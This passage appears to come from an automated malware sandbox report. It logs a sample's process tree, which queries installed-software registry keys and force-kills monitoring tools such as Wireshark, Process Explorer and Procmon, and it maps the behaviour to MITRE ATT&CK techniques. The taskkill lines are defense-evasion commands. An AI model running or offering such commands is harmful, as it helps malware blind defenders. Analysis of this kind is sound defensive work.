    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:2012
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:1792
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:568
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:64
    3⤵
    PID:576
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:32
    3⤵
    PID:1976
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1680
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:1824
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:1876
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1368
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:2028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:268
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1784
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:1796
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:796
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:888
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:1844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:2024
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:608
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:1032
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:1628
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1380
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1692
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:1656
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:1100
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:1496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:1112
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:64
    3⤵
    PID:1528
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:32
    3⤵
    PID:1832
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1056
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:64
    3⤵
    PID:1064
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:32
    3⤵
    PID:1560
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1524
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:64
    3⤵
    PID:1932
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:32
    3⤵
    PID:1084
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:576
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:1980
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:1944
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1876
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:524
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:1296
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1712
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:1796
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:1536
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1844
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1880
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2032
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1904
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1560
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1980
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1384

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1892-152-0x000000001A9B0000-0x000000001A9B1000-memory.dmp

Filesize
4KB

Download
memory/1892-91-0x0000000002010000-0x0000000002011000-memory.dmp

Filesize
4KB

Download
memory/1892-81-0x00000000024F0000-0x00000000024F1000-memory.dmp

Filesize
4KB

Download
memory/1892-124-0x0000000002520000-0x0000000002521000-memory.dmp

Filesize
4KB

Download
memory/1892-74-0x0000000002420000-0x0000000002421000-memory.dmp

Filesize
4KB

Download
memory/1892-154-0x000000001A9C0000-0x000000001A9C1000-memory.dmp

Filesize
4KB

Download
memory/1892-33-0x000007FEF6440000-0x000007FEF6E2C000-memory.dmp

Filesize
9.9MB

Download
memory/1892-75-0x000000001AC20000-0x000000001AC21000-memory.dmp

Filesize
4KB

Download
memory/1892-130-0x00000000027D0000-0x00000000027D1000-memory.dmp

Filesize
4KB

Download